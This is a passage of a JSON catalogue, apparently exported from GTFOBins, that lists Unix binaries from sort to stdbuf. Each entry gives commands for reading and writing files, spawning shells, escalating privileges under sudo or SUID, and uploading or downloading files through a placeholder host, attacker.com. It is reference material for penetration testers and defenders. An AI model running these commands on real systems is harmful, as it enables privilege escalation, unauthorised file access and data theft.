/path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sort/"]},{"id":"gtfo:sort:file-read:0:unprivileged","toolId":"gtfo:sort","toolName":"sort","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sort -m /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sort/"]},{"id":"gtfo:sort:file-write:0:sudo","toolId":"gtfo:sort","toolName":"sort","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | sort -m -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sort/"]},{"id":"gtfo:sort:file-write:0:suid","toolId":"gtfo:sort","toolName":"sort","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | sort -m -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sort/"]},{"id":"gtfo:sort:file-write:0:unprivileged","toolId":"gtfo:sort","toolName":"sort","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | sort -m -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sort/"]},{"id":"gtfo:split:file-read:0:sudo","toolId":"gtfo:split","toolName":"split","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix\ncat prefixaasuffix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:file-read:0:suid","toolId":"gtfo:split","toolName":"split","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix\ncat prefixaasuffix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:file-read:0:unprivileged","toolId":"gtfo:split","toolName":"split","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix\ncat prefixaasuffix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:file-write:0:sudo","toolId":"gtfo:split","toolName":"split","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:file-write:0:suid","toolId":"gtfo:split","toolName":"split","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:file-write:0:unprivileged","toolId":"gtfo:split","toolName":"split","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:shell:0:sudo","toolId":"gtfo:split","toolName":"split","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:shell:0:suid","toolId":"gtfo:split","toolName":"split","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:shell:0:unprivileged","toolId":"gtfo:split","toolName":"split","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:sqlite3:file-read:0:sudo","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sqlite3 <<EOF\nCREATE TABLE x(x TEXT);\n.import /path/to/input-file x\nSELECT * FROM x;\nEOF","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:file-read:0:suid","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sqlite3 <<EOF\nCREATE TABLE x(x TEXT);\n.import /path/to/input-file x\nSELECT * FROM x;\nEOF","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:file-read:0:unprivileged","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sqlite3 <<EOF\nCREATE TABLE x(x TEXT);\n.import /path/to/input-file x\nSELECT * FROM x;\nEOF","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:file-write:0:sudo","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sqlite3 /dev/null -cmd '.output /path/to/output-file' 'select \"DATA\";'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:file-write:0:suid","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sqlite3 /dev/null -cmd '.output /path/to/output-file' 'select \"DATA\";'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:file-write:0:unprivileged","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"sqlite3 /dev/null -cmd '.output /path/to/output-file' 'select \"DATA\";'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:shell:0:sudo","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sqlite3 /dev/null '.shell /bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:shell:0:suid","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sqlite3 /dev/null '.shell /bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:shell:0:unprivileged","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sqlite3 /dev/null '.shell /bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlmap:inherit:0:sudo","toolId":"gtfo:sqlmap","toolName":"sqlmap","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"sqlmap -u 127.0.0.1 --eval='...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlmap/"]},{"id":"gtfo:sqlmap:inherit:0:unprivileged","toolId":"gtfo:sqlmap","toolName":"sqlmap","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"sqlmap -u 127.0.0.1 --eval='...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlmap/"]},{"id":"gtfo:ss:file-read:0:sudo","toolId":"gtfo:ss","toolName":"ss","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ss -a -F /path/to/input-file","description":"The file content is actually parsed so only a part of the first line is returned as a part of an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ss/"]},{"id":"gtfo:ss:file-read:0:suid","toolId":"gtfo:ss","toolName":"ss","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ss -a -F /path/to/input-file","description":"The file content is actually parsed so only a part of the first line is returned as a part of an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ss/"]},{"id":"gtfo:ss:file-read:0:unprivileged","toolId":"gtfo:ss","toolName":"ss","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ss -a -F /path/to/input-file","description":"The file content is actually parsed so only a part of the first line is returned as a part of an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ss/"]},{"id":"gtfo:ssh:download:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ssh user@attacker.com 'cat /path/to/input-file\"","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:download:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ssh user@attacker.com 'cat /path/to/input-file\"","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:download:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"ssh user@attacker.com 'cat /path/to/input-file\"","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:file-read:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh -F /path/to/input-file x","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:file-read:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh -F /path/to/input-file x","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:file-read:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ssh -F /path/to/input-file x","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh localhost /bin/sh","description":"Reconnecting may help bypassing restricted shells.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh localhost /bin/sh","description":"Reconnecting may help bypassing restricted shells.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh localhost /bin/sh","description":"Reconnecting may help bypassing restricted shells.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:1:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:1:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:2:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh localhost","description":"Spawn the shell on the client, but still requires a successful remote connection.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:2:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh localhost","description":"Spawn the shell on the client, but still requires a successful remote connection.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:upload:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"echo DATA | ssh user@attacker.com 'cat >/path/to/output-file\"","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:upload:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"echo DATA | ssh user@attacker.com 'cat >/path/to/output-file\"","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:upload:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"echo DATA | ssh user@attacker.com 'cat >/path/to/output-file\"","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh-agent:shell:0:sudo","toolId":"gtfo:ssh-agent","toolName":"ssh-agent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh-agent /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-agent/"]},{"id":"gtfo:ssh-agent:shell:0:suid","toolId":"gtfo:ssh-agent","toolName":"ssh-agent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh-agent /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh-agent/"]},{"id":"gtfo:ssh-agent:shell:0:unprivileged","toolId":"gtfo:ssh-agent","toolName":"ssh-agent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh-agent /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-agent/"]},{"id":"gtfo:ssh-copy-id:file-read:0:sudo","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh-copy-id -f -i /path/to/input-file.pub user@attacker.com","description":"The input file must have the `.pub` file extension. The file will be copied to `~/.ssh/authorized_keys`, otherwise the `-t /path/to/output-file` option can be used.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"]},{"id":"gtfo:ssh-copy-id:file-read:0:unprivileged","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ssh-copy-id -f -i /path/to/input-file.pub user@attacker.com","description":"The input file must have the `.pub` file extension. The file will be copied to `~/.ssh/authorized_keys`, otherwise the `-t /path/to/output-file` option can be used.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"]},{"id":"gtfo:ssh-copy-id:file-write:0:sudo","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ssh-copy-id -f -i /path/to/input-file.pub -t /path/to/output-file user@host","description":"The input file must have the `.pub` file extension.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"]},{"id":"gtfo:ssh-copy-id:file-write:0:unprivileged","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ssh-copy-id -f -i /path/to/input-file.pub -t /path/to/output-file user@host","description":"The input file must have the `.pub` file extension.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"]},{"id":"gtfo:ssh-keygen:library-load:0:sudo","toolId":"gtfo:ssh-keygen","toolName":"ssh-keygen","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ssh-keygen -D /path/to/lib.so","description":"The shared library must contain the `void C_GetFunctionList() {}` function.","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"]},{"id":"gtfo:ssh-keygen:library-load:0:suid","toolId":"gtfo:ssh-keygen","toolName":"ssh-keygen","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ssh-keygen -D /path/to/lib.so","description":"The shared library must contain the `void C_GetFunctionList() {}` function.","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"]},{"id":"gtfo:ssh-keygen:library-load:0:unprivileged","toolId":"gtfo:ssh-keygen","toolName":"ssh-keygen","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"ssh-keygen -D /path/to/lib.so","description":"The shared library must contain the `void C_GetFunctionList() {}` function.","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"]},{"id":"gtfo:ssh-keyscan:file-read:0:sudo","toolId":"gtfo:ssh-keyscan","toolName":"ssh-keyscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh-keyscan -f /path/to/input-file","description":"The file content is actually parsed so only a part of each line is returned as a part of an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"]},{"id":"gtfo:ssh-keyscan:file-read:0:suid","toolId":"gtfo:ssh-keyscan","toolName":"ssh-keyscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh-keyscan -f /path/to/input-file","description":"The file content is actually parsed so only a part of each line is returned as a part of an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"]},{"id":"gtfo:ssh-keyscan:file-read:0:unprivileged","toolId":"gtfo:ssh-keyscan","toolName":"ssh-keyscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ssh-keyscan -f /path/to/input-file","description":"The file content is actually parsed so only a part of each line is returned as a part of an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"]},{"id":"gtfo:sshfs:command:0:sudo","toolId":"gtfo:sshfs","toolName":"sshfs","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"sshfs -o ssh_command=/path/to/command x: /path/to/dir/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshfs/"]},{"id":"gtfo:sshfs:command:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"sshfs -o ssh_command=/path/to/command x: /path/to/dir/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"]},{"id":"gtfo:sshfs:download:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"sshfs user@attacker.com:/ /path/to/dir/\ncp /path/to/dir/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"]},{"id":"gtfo:sshfs:shell:0:sudo","toolId":"gtfo:sshfs","toolName":"sshfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file\nchmod +x /path/to/temp-file\nsshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/","description":"The mount dir must be writable by the invoking user.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshfs/"]},{"id":"gtfo:sshfs:shell:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file\nchmod +x /path/to/temp-file\nsshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/","description":"The mount dir must be writable by the invoking user.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"]},{"id":"gtfo:sshfs:upload:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"sshfs user@attacker.com:/ /path/to/dir/\ncp /path/to/input-file /path/to/dir/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"]},{"id":"gtfo:sshpass:shell:0:sudo","toolId":"gtfo:sshpass","toolName":"sshpass","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sshpass /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshpass/"]},{"id":"gtfo:sshpass:shell:0:suid","toolId":"gtfo:sshpass","toolName":"sshpass","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sshpass /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sshpass/"]},{"id":"gtfo:sshpass:shell:0:unprivileged","toolId":"gtfo:sshpass","toolName":"sshpass","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sshpass /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshpass/"]},{"id":"gtfo:sshuttle:shell:0:sudo","toolId":"gtfo:sshuttle","toolName":"sshuttle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sudo sshuttle -r x --ssh-cmd '/bin/sh -c \"/bin/sh 0<&2 1>&2\"' localhost","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshuttle/"]},{"id":"gtfo:start-stop-daemon:shell:0:sudo","toolId":"gtfo:start-stop-daemon","toolName":"start-stop-daemon","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"start-stop-daemon -S -x /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"]},{"id":"gtfo:start-stop-daemon:shell:0:suid","toolId":"gtfo:start-stop-daemon","toolName":"start-stop-daemon","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"start-stop-daemon -S -x /bin/sh -- -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"]},{"id":"gtfo:start-stop-daemon:shell:0:unprivileged","toolId":"gtfo:start-stop-daemon","toolName":"start-stop-daemon","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"start-stop-daemon -S -x /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"]},{"id":"gtfo:stdbuf:shell:0:sudo","toolId":"gtfo:stdbuf","toolName":"stdbuf","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"stdbuf -i0 